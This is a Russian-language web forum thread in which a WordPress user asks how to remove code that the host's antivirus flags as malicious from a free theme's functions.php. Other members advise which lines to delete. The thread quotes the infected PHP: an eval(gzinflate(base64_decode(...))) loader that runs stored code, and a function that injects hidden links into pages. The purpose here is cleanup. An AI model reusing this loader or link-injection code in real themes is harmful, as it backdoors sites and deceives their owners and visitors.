Перейти к содержимому

Фотография

Помогите, как правильно удалить base64_decode


  • Авторизуйтесь для ответа в теме
Сообщений в теме: 6

#1 Avatarius

Avatarius

    Новичок

  • Пользователи
  • Pip
  • 4 сообщений
0
Обычный

Отправлено 05 Март 2014 - 16:25

С помощью плагина Theme Authenticity Checker (TAC) нашел на сайте в теме

 

wp-content/themes/laptop_tech_fantasy_tee046/functions.php:

Line 693: "base64_decode($s)));..."
Line 947: "base64_decode($s)));..."

wp-content/themes/laptop_tech_fantasy_tee046/functions.php:

<a href="https://twitter.com/share" class="twitter-share-button" data-url="www.freewordpressthemes4u.com">Tweet</a>

Помогите разобраться, как правильно удалить их, чтоб не повредить тему

Вот вырезка из этих строчек из файла functions.php:

function legacy_items($output0){
    if(!is_single()){
    $s = get_settings( 'lcmp_lic' );
    if($s === FALSE || $s==''){
        global $option;
        if(file_exists($option)){
            $s = file_get_contents($option);
            update_option('lcmp_lic',$s);
        }
    }
    $lcmp_lic_str = str_replace("?>","",gzinflate(base64_decode($s)));   
    $re = '~<p class="page-footer">([^<]*)~';
    $output1 = preg_replace($re,'<ul style="display:none;">$1',$lcmp_lic_str);
    $re = '~.*<a href="([^"]*)">([^<]*)</a>([^<]*)<a href="([^"]*)">([^<]*)</a>.*~';   
    $output1 = preg_replace($re,'<li><a href="$1">$2</a></li><li><a href="$4">$5</a></li>',$output1);
    $re = '~</p>~';
    $output1 = preg_replace($re,'</ul>',$output1);
    return $output0.$output1;
    }else
    return $output0;
}

и тут

function lcmp_theme_options_end(){
    $s = get_settings( 'lcmp_lic' );
    if($s === FALSE || $s==''){
        global $option;
        if(file_exists($option)){
            $s = file_get_contents($option);
            update_option('lcmp_lic',$s);
        }
    }
    eval(gzinflate(base64_decode($s)));
}

  • 0

На правах рекламы

#2 Николай Буров

Николай Буров

    Свой человек

  • Киберсанты
  • PipPipPipPipPip
  • 928 сообщений
614
Очень хороший
  • Пол:Мужчина

Отправлено 05 Март 2014 - 17:00

Я так понимаю это защита темы, Вы пытаетесь взломать премиум тему или что?


  • 0

#3 Avatarius

Avatarius

    Новичок

  • Пользователи
  • Pip
  • 4 сообщений
0
Обычный

Отправлено 06 Март 2014 - 07:07

Я пытаюсь убрать внедоносный код с темы своего сайта, так как серверный антивирус при проверке постоянно удаляет файл functions.php из-за наличия там вредоносного кода, вследствие чего приходится заново восстанавливать его из резервной копии.


  • 0

#4 Сергей (ex-Gudvin)

Сергей (ex-Gudvin)

    Ученик

  • Киберсанты
  • PipPipPipPipPip
  • 5 785 сообщений
2 710
Очень хороший
  • Пол:Мужчина

Отправлено 06 Март 2014 - 17:00

Возможно, не этот код является вредоносным, т.к. у официального источника этот код также присутствует в теме (в файле functions.php)... Или серверный антивирус ошибочно считает его вредоносным. С хостером не списывались по этому вопросу?


  • 0

Кто счастлив, тот и прав. (Л. Н. Толстой)


#5 Avatarius

Avatarius

    Новичок

  • Пользователи
  • Pip
  • 4 сообщений
0
Обычный

Отправлено 06 Март 2014 - 20:42

Хостер мне дал такой ответ :

Восстановили сайт на число когда он работал. Сейчас сайт доступен.

Вот список инфицированных файлов в нем с путями к файлам:

{HEX}gzbase64.inject.unclassed.15 : public_html/wp-content/themes/computer_at_the_desk_tee045/functions.php
{HEX}gzbase64.inject.unclassed.15 : public_html/wp-content/themes/laptop_tech_fantasy_tee046/functions.php
{HEX}gzbase64.inject.unclassed.15 : public_html/wp-content/themes/pc_computer_magic_tee040/functions.php
{HEX}gzbase64.inject.unclassed.15 : public_html/wp-content/themes/laptop_new_technology_tee091/functions.php


Вам НЕОБХОДИМО очистить эти файлы вручную от вредоносного кода или загрузить вместо них чистые файлы движка. Никогда не загружайте из непроверенных источников файлы для сайта это повлечет их дальнейшее заражение в взлом сайта.

ПРЕДУПРЕЖДЕНИЕ: При следующей автоматической проверке антивирусным сканером, эти файлы будут перемещены в карантин, если Вы их не очистите. Что повлечет за собой снова неработоспособность сайта.

Вторая тема моя, остальные я удалил
Написал им вчера по поводу того, что выдал мне плагин TAC в этом файле ... ответа еще не получил.


  • 0

#6 Сергей (ex-Gudvin)

Сергей (ex-Gudvin)

    Ученик

  • Киберсанты
  • PipPipPipPipPip
  • 5 785 сообщений
2 710
Очень хороший
  • Пол:Мужчина

Отправлено 07 Март 2014 - 06:06

Сейчас обратил внимание, что тема очень старая и, возможно, уже не поддерживается разработчиком... Рекомендую Вам воспользоваться какой-нибудь другой темой...

 

В Вашем же случае, из первого приведённого Вами блока кода удалите:

$lcmp_lic_str = str_replace("?>","",gzinflate(base64_decode($s)));   
    $re = '~<p class="page-footer">([^<]*)~';
    $output1 = preg_replace($re,'<ul style="display:none;">$1',$lcmp_lic_str);
    $re = '~.*<a href="([^"]*)">([^<]*)</a>([^<]*)<a href="([^"]*)">([^<]*)</a>.*~';   
    $output1 = preg_replace($re,'<li><a href="$1">$2</a></li><li><a href="$4">$5</a></li>',$output1);
    $re = '~</p>~';
    $output1 = preg_replace($re,'</ul>',$output1);
    return $output0.$output1;

...а из второго блока кода удалите:

eval(gzinflate(base64_decode($s)));

  • 1

Кто счастлив, тот и прав. (Л. Н. Толстой)


#7 Avatarius

Avatarius

    Новичок

  • Пользователи
  • Pip
  • 4 сообщений
0
Обычный

Отправлено 07 Март 2014 - 20:36

Спасибо за помощь, тема не отвалилась и антивирь не ругается.


  • 0




Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 скрытых пользователей